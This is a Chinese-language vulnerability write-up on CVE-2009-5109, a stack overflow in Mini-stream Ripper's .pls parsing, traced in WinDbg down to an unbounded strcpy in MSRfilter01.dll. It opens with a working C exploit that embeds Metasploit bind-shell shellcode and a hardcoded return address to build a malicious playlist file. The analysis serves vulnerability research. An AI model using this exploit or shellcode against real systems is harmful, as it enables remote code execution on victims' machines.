Mini-STREAM RIPPER .pls缓冲区溢出漏洞(CVE-2009-5109)

作者:k0shl 转载请注明出处 作者博客地址:http://whereisk0shl.top


漏洞说明


软件下载:
https://www.exploit-db.com/apps/ff609955485ea7bd71d403c330a946aa-Mini-streamRipper.exe

PoC:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
 
/* win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum 
   http://metasploit.com */
 
/*
 * Metasploit-generated payload quoted by the original PoC (see the header
 * comment above). It is NOT needed to reproduce the overflow itself: as the
 * text below notes, replacing this array (and the return-address bytes in
 * main) with filler such as 0x41 still crashes the parser. Being a string
 * literal, sizeof(shell) is one larger than the byte count in the header
 * because of the implicit terminating NUL.
 */
unsigned char shell[] = 
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a";
 
/*
 * Writes the crafted playlist "mini-stream-ripper.pls" into the current
 * directory and returns 0. argc/argv are unused. The file is a long run of
 * filler, a 4-byte return-address override, a short NOP run, the payload
 * array above, then trailing bytes; the unbounded strcpy() in
 * Playlist_FindNextItem (decompiled further down) copies the entry onto the
 * caller's stack frame unchecked, which is where the overwrite lands.
 *
 * Notes for anyone re-using this as a crash-only test case:
 *  - sizeof(shell) counts the string literal's terminating NUL, so 718
 *    bytes are written here, not the 717 stated in the payload header.
 *  - fwrite()/fclose() return values are never checked, and exit(0) after
 *    a failed fopen() reports success to the caller's shell.
 *  - To reproduce only the crash, replace EIP, the NOPs and shell with
 *    filler such as 0x41, as the text below suggests.
 */
int main ( int argc , char * argv[])
{
    FILE* expfle= NULL;
    char* EIP = "\x53\x93\x42\x7e"; // address inside user32.dll of the XP SP3 test system -- build-specific, lands on the saved return address
    int i;
 
    printf("\t. .. ... Mini-stream Ripper (.pls) Stack buffer Overflow Exploit ... .. .\r\n");
    printf("\t          -------> now upload the .pls file to a remote server <-------\n");
 
 
    if( (expfle=fopen("mini-stream-ripper.pls","wb")) ==NULL )
    {
         perror("Cannot create the exploit file!!! :(");
         exit(0); // NOTE: exits with status 0 even though creation failed
    }
 
                for (i=0; i<17405; i++)
                {
                    fwrite("\x41", 1, 1, expfle); // filler: 17405 bytes precede the saved return address in the overflowed frame
                }
 
                fwrite(EIP, 4, 1, expfle); // 4 bytes that replace the saved return address
 
                for (i=0; i<10; i++)
                {
                    fwrite("\x90", 1, 1, expfle); // NOP sled; this is the 0x90909090 seen in the windbg dumps below
                }
         
        fwrite(shell, sizeof(shell), 1, expfle); // payload array (sizeof includes its trailing NUL)
 
        for (i=0; i<16702; i++)
                {
                    fwrite("\xcc", 1, 1, expfle); // trailing padding (0xcc) to the end of the entry
                }
 
                fclose(expfle); // return value unchecked; a write error would go unnoticed
 
                printf("[+] mini-stream-ripper.pls Created successfully! \r\n");
                printf("[+] Exploited by mr_me \r\n");
 
    return 0;
 
}

调试环境:
Windows xp sp3

这个PoC是C语言的,可以用VC6.0进行编译,同样会生成一个.pls文件,然后直接用Mini-stream RIPPER打开,就能够触发漏洞了,不过这个PoC包含shellcode,如果想正常引发crash的话,可以把相关的跳转,shellcode等部分的内容直接修改成畸形字符串,比如"\x41"即可。


漏洞复现


此漏洞是由于Ripper.exe对于.pls文件处理时,没有对文件内容的长度进行检查,从而在MSRfilter01.dll中处理文件时拷贝了异常字符串,导致了缓冲区溢出,当调用函数sub_42B840时,由于超长字符串覆盖了缓冲区,从而导致了漏洞的发生。

我们生成一个样本文件,打开ripper.exe,加载样本文件,附加windbg,到达漏洞现场。

0:010> g
(304.e0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=000fbbd4 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3
eip=90909090 esp=000f7298 ebp=000fbfb4 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
90909090 ??              ???

这时我们使用kb回溯堆栈调用。

0:000> kb
ChildEBP RetAddr  Args to Child              
WARNING: Frame IP not in any known module. Following frames may be wrong.
000f7294 90909090 90909090 90909090 41909090 0x90909090
000fbfb4 00000000 00000000 00000000 00000000 0x90909090

发现此时堆栈已经被完全破坏了,没法通过堆栈调用来回溯漏洞现场,我们重新观察poc,当程序打开时,应该会调用fopen,我们通过ida pro重新查找关键函数fopen,得到下面四处调用。

.text:0045B6F7                 call    ds:fopen
.text:00446E37                 call    ds:fopen
.text:00446232                 call    ds:fopen
.text:00429636                 call    ds:fopen

漏洞分析


我们在这四处调用下断点。

0:010> bp 0045B6F7
*** WARNING: Unable to verify checksum for C:\Program Files\Mini-stream\Mini-stream Ripper\Ripper.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\Mini-stream\Mini-stream Ripper\Ripper.exe
0:010> bp 00446E37
0:010> bp 00446232
0:010> bp 00429636

重新加载程序,附加样本后程序在一处fopen中断,为了确认这处调用,我们直接继续运行,发现到达漏洞位置。

0:010> bl
 0 e 0045b6f7     0001 (0001)  0:**** Ripper+0x5b6f7
 1 e 00446e37     0001 (0001)  0:**** Ripper+0x46e37
 2 e 00446232     0001 (0001)  0:**** Ripper+0x46232
 3 e 00429636     0001 (0001)  0:**** Ripper+0x29636
0:010> g
Breakpoint 3 hit
eax=00000000 ebx=000fbbd4 ecx=004842ac edx=000f2f3a esi=00000000 edi=0047f7c8
eip=00429636 esp=000f7290 ebp=000fbfb4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
Ripper+0x29636:
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\msvcrt.dll - 
00429636 ff15d4aa4600    call    dword ptr [Ripper+0x6aad4 (0046aad4)] ds:0023:0046aad4={msvcrt!fopen (77c0f010)}
0:000> g
(108.7dc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=000fbbd4 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3
eip=90909090 esp=000f7298 ebp=000fbfb4 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
90909090 ??              ???

因此我们可以确定这处call调用是关键调用,我们重新附加,直接到达这处call fopen调用。

0:010> bp 00429636
*** WARNING: Unable to verify checksum for C:\Program Files\Mini-stream\Mini-stream Ripper\Ripper.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\Mini-stream\Mini-stream Ripper\Ripper.exe
0:010> g
Breakpoint 0 hit
eax=00000000 ebx=000fbbd4 ecx=004842ac edx=000f2f3a esi=00000000 edi=0047f7c8
eip=00429636 esp=000f7290 ebp=000fbfb4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
Ripper+0x29636:
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\msvcrt.dll - 
00429636 ff15d4aa4600    call    dword ptr [Ripper+0x6aad4 (0046aad4)] ds:0023:0046aad4={msvcrt!fopen (77c0f010)}
0:000> dd esp
000f7290  000fbbd4 0047f794 00000001 00000000

这时我们看看fopen的第一个参数

0:000> dc poi(esp)
000fbbd4  445c3a43 6d75636f 73746e65 646e6120  C:\Documents and
000fbbe4  74655320 676e6974 64415c73 696e696d   Settings\Admini
000fbbf4  61727473 5c726f74 73617263 702e3268  strator\crash2.p
000fbc04  0000736c 00000014 00000001 00000000  ls

确实是打开样本文件的操作,接下来,我们进行单步跟进。

0:000> p
eax=00000001 ebx=000fbbd4 ecx=000fbfb4 edx=7c92e4f4 esi=77c2fce0 edi=000066c3
eip=00429856 esp=000f7294 ebp=000fbfb4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
Ripper+0x29856:
00429856 e8e51f0000      call    Ripper+0x2b840 (0042b840)

到达这个位置的时候,单步步过,漏洞被触发,我们查看一下,其实是在这个函数的一个分支逻辑。

mov     ecx, ebp
mov     dword_4BB364, 2
call    sub_4208E0
push    ebx             ; ArgList
mov     ecx, ebp
call    sub_42B840

在进入这个call调用时,我们来查看一下它的参数,首先来看看这个函数定义。

signed int __userpurge sub_42B840<eax>(int a1<eax>, const char *ArgList)

定义了一个指针,和一个整数变量,这个指针实际上是文件路径。

0:000> dd esp
000f7294  000fbbd4 00000001
0:000> dc poi(esp)
000fbbd4  445c3a43 6d75636f 73746e65 646e6120  C:\Documents and
000fbbe4  74655320 676e6974 64415c73 696e696d   Settings\Admini
000fbbf4  61727473 5c726f74 73617263 702e3268  strator\crash2.p
000fbc04  0000736c 00000014 00000001 00000000  ls

我们进入这个函数,单步跟踪,在即将到达ret的时候,我们看到了如下指令,以及内存变化。

eax=00000000 ebx=00000000 ecx=00000461 edx=000008c3 esi=00000001 edi=00f056f8
eip=0042ba8b esp=000ee94c ebp=00f07a04 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
Ripper+0x2ba8b:
0042ba8b 8b8c2438890000  mov     ecx,dword ptr [esp+8938h] ss:0023:000f7284=b87b4141
0:000> dd esp+8938
000f7284  b87b4141 45530146 ffffffff 90909090
000f7294  90909090 90909090 90909090 90909090
000f72a4  41909090 41414141 41414141 41414141
000f72b4  41414141 41414141 41414141 41414141
000f72c4  41414141 41414141 41414141 41414141
000f72d4  41414141 41414141 41414141 41414141
000f72e4  41414141 41414141 41414141 41414141

可以看到此时esp对应地址已经被畸形字符串覆盖了,那么接下来。

0:000> p
eax=00000000 ebx=00000000 ecx=b87b4141 edx=000008c3 esi=00000001 edi=00f056f8
eip=0042ba92 esp=000ee94c ebp=00f07a04 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
Ripper+0x2ba92:
0042ba92 5f              pop     edi
0:000> p
eax=00000000 ebx=00000000 ecx=b87b4141 edx=000008c3 esi=00000001 edi=000066c3
eip=0042ba93 esp=000ee950 ebp=00f07a04 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
Ripper+0x2ba93:
0042ba93 5e              pop     esi
0:000> p
eax=00000000 ebx=00000000 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3
eip=0042ba94 esp=000ee954 ebp=00f07a04 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
Ripper+0x2ba94:
0042ba94 5d              pop     ebp
0:000> p
eax=00000000 ebx=00000000 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3
eip=0042ba95 esp=000ee958 ebp=000fbfb4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
Ripper+0x2ba95:
0042ba95 5b              pop     ebx
0:000> p
eax=00000000 ebx=000fbbd4 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3
eip=0042ba96 esp=000ee95c ebp=000fbfb4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
Ripper+0x2ba96:
0042ba96 64890d00000000  mov     dword ptr fs:[0],ecx fs:003b:00000000=000f7284
0:000> p
eax=00000000 ebx=000fbbd4 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3
eip=0042ba9d esp=000ee95c ebp=000fbfb4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
Ripper+0x2ba9d:
0042ba9d 81c434890000    add     esp,8934h
0:000> p
eax=00000000 ebx=000fbbd4 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3
eip=0042baa3 esp=000f7290 ebp=000fbfb4 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
Ripper+0x2baa3:
0042baa3 c20400          ret     4
0:000> p
eax=00000000 ebx=000fbbd4 ecx=b87b4141 edx=000008c3 esi=77c2fce0 edi=000066c3
eip=90909090 esp=000f7298 ebp=000fbfb4 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
90909090 ??              ???

连续的pop之后,栈退出,返回后指向了90909090这个地址,可控,从而能达到控制eip执行任意代码的目的。

那么我们需要知道何时栈被畸形字符串覆盖,但是经过分析sub_42B840这个函数内部很大,我们需要快速定位到内存被覆盖的时刻,这样我们可以使用ba命令,在存在问题的位置下断点,首先我们进入这个函数时,可以观察内存空间。

0:000> p
eax=00008928 ebx=000fbbd4 ecx=000fbfb4 edx=7c92e4f4 esi=77c2fce0 edi=000066c3
eip=0042b85a esp=000f7284 ebp=000fbfb4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
Ripper+0x2b85a:
0042b85a e8f1600300      call    Ripper+0x61950 (00461950)
0:000> p
eax=0042b85f ebx=000fbbd4 ecx=000fbfb4 edx=7c92e4f4 esi=77c2fce0 edi=000066c3
eip=0042b85f esp=000ee95c ebp=000fbfb4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
Ripper+0x2b85f:
0042b85f 53              push    ebx
0:000> dd esp+8938
000f7294  000fbbd4 00000001 00000000 7d647c29
000f72a4  00a00054 00000000 00000000 00000000
000f72b4  00000000 00000000 00000000 00000000
000f72c4  00000000 00000000 00000000 00000000
000f72d4  00000000 00000000 00000000 00000000
000f72e4  00000000 00000000 00000000 00000000
000f72f4  00000000 00000000 00000000 00000000
000f7304  00000000 00000000 00000000 00000000

此时esp对应位置存放的还是传入参数,这样我们在000f7294的位置下内存写入断点。

0:000> ba w1 000f7294
0:000> bl
 0 e 00429856     0001 (0001)  0:**** Ripper+0x29856
 1 e 000f7294 w 1 0001 (0001)  0:**** 
0:000> g
Breakpoint 1 hit
eax=00000000 ebx=00000000 ecx=00000033 edx=000066ec esi=02ed3548 edi=000f72a4
eip=1000b5e3 esp=000ee930 ebp=000fbbd4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** WARNING: Unable to verify checksum for C:\Program Files\Mini-stream\Mini-stream Ripper\MSRfilter01.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Mini-stream\Mini-stream Ripper\MSRfilter01.dll - 
MSRfilter01!Playlist_FindNextItem+0x53:
1000b5e3 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

执行到这一步的时候可以看一下对应位置发生了什么变化。

0:000> p
eax=00000000 ebx=00000000 ecx=00000000 edx=000066ec esi=02ed3614 edi=000f7370
eip=1000b5e5 esp=000ee930 ebp=000fbbd4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
MSRfilter01!Playlist_FindNextItem+0x55:
1000b5e5 8bca            mov     ecx,edx
0:000> dd 000f7284
000f7284  b87b4141 45530146 90905958 90909090
000f7294  90909090 90909090 90909090 90909090
000f72a4  41909090 41414141 41414141 41414141
000f72b4  41414141 41414141 41414141 41414141
000f72c4  41414141 41414141 41414141 41414141
000f72d4  41414141 41414141 41414141 41414141
000f72e4  41414141 41414141 41414141 41414141

那么可以看到此时内存已经被覆盖了,那么我们需要再次回溯,看看000f7294到底是什么原因被修改的。

这个函数处于MSRfilter01.dll中,我们重新来看一下这个函数的过程。

/*
 * IDA decompilation from MSRfilter01.dll. Fetches the "next playlist item"
 * string via sub_10008CC0() and copies it into the caller-supplied buffer
 * a1, returning 1; returns 0 when no item is available.
 *
 * Root cause of CVE-2009-5109: strcpy() below has no length bound and a1
 * carries no size, so an over-long .pls entry overruns the caller's buffer.
 * In the windbg session above that buffer appears to be a stack buffer in
 * Ripper.exe's sub_42B840, which is why the saved return address ends up
 * holding file content. A fix needs the caller's buffer size (a bounded
 * copy that fails or truncates when the item does not fit); that size is
 * not recoverable from this function alone.
 */
signed int __cdecl Playlist_FindNextItem(char *a1)
{
  const char *v1; // eax@1
  signed int result; // eax@2

  /* presumably a debug logger; the format expects "%s(%u)" but only one
     extra argument is shown -- likely a decompilation artefact, not part
     of the overflow */
  sub_1000B630(
    5,
    "Debug: Playlist_FindNextItem enter. %s(%u)",
    (unsigned int)"D:\\Mpf2.0\\MplayerMod\\dll_interface\\PlayListInterface.c");
  v1 = (const char *)sub_10008CC0(dword_10063BA0, 1); /* returns the item read from the playlist file */
  if ( v1 )
  {
    strcpy(a1, v1); /* unbounded copy -- the overflow happens here */
    sub_1000B630(
      5,
      "Debug: Playlist_FindNextItem ok. %s(%u)",
      (unsigned int)"D:\\Mpf2.0\\MplayerMod\\dll_interface\\PlayListInterface.c");
    result = 1;
  }
  else
  {
    sub_1000B630(
      5,
      "Debug: Playlist_FindNextItem NO File return. %s(%u)",
      (unsigned int)"D:\\Mpf2.0\\MplayerMod\\dll_interface\\PlayListInterface.c");
    result = 0;
  }
  return result;
}

可以看到,v1存放在eax中,而eax正是存放异常串指针的寄存器,sub_10008CC0用于获取这个指针的值,随后strcpy会将v1拷贝到a1指针中,而正是这个操作没有进行长度检查,导致超长串拷入时会冲垮下面栈中的内容。

这一步可以看到eax经过call函数调用后会被赋予异常串的值

0:010> g
Breakpoint 0 hit
eax=00ee0878 ebx=00000000 ecx=7c93003d edx=00000020 esi=000fbc07 edi=000f50b7
eip=1000b5ae esp=000ee92c ebp=000fbbd4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
MSRfilter01!Playlist_FindNextItem+0x1e:
1000b5ae e80dd7ffff      call    MSRfilter01+0x8cc0 (10008cc0)
0:000> dd 000f7284
000f7284  000fbd48 004650db ffffffff 0042985b
000f7294  000fbbd4 00000001 00000000 7d647c29
000f72a4  00a00054 00000000 00000000 00000000
000f72b4  00000000 00000000 00000000 00000000
000f72c4  00000000 00000000 00000000 00000000
000f72d4  00000000 00000000 00000000 00000000
000f72e4  00000000 00000000 00000000 00000000
000f72f4  00000000 00000000 00000000 00000000
0:000> p
eax=02eccf28 ebx=00000000 ecx=00ee08c0 edx=00000000 esi=000fbc07 edi=000f50b7
eip=1000b5b3 esp=000ee92c ebp=000fbbd4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
MSRfilter01!Playlist_FindNextItem+0x23:
1000b5b3 83c418          add     esp,18h

紧接着拷贝,造成栈被冲垮。

0:000> p
eax=00000000 ebx=00000000 ecx=000019bb edx=000066ec esi=02eccf28 edi=000f0c84
eip=1000b5e3 esp=000ee930 ebp=000fbbd4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
MSRfilter01!Playlist_FindNextItem+0x53:
1000b5e3 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> dd 000f7284
000f7284  000fbd48 004650db ffffffff 0042985b
000f7294  000fbbd4 00000001 00000000 7d647c29
000f72a4  00a00054 00000000 00000000 00000000
000f72b4  00000000 00000000 00000000 00000000
000f72c4  00000000 00000000 00000000 00000000
000f72d4  00000000 00000000 00000000 00000000
000f72e4  00000000 00000000 00000000 00000000
000f72f4  00000000 00000000 00000000 00000000
0:000> p
eax=00000000 ebx=00000000 ecx=00000000 edx=000066ec esi=02ed3614 edi=000f7370
eip=1000b5e5 esp=000ee930 ebp=000fbbd4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
MSRfilter01!Playlist_FindNextItem+0x55:
1000b5e5 8bca            mov     ecx,edx
0:000> dd 000f7284
000f7284  b87b4141 45530146 90905958 90909090
000f7294  90909090 90909090 90909090 90909090
000f72a4  41909090 41414141 41414141 41414141
000f72b4  41414141 41414141 41414141 41414141
000f72c4  41414141 41414141 41414141 41414141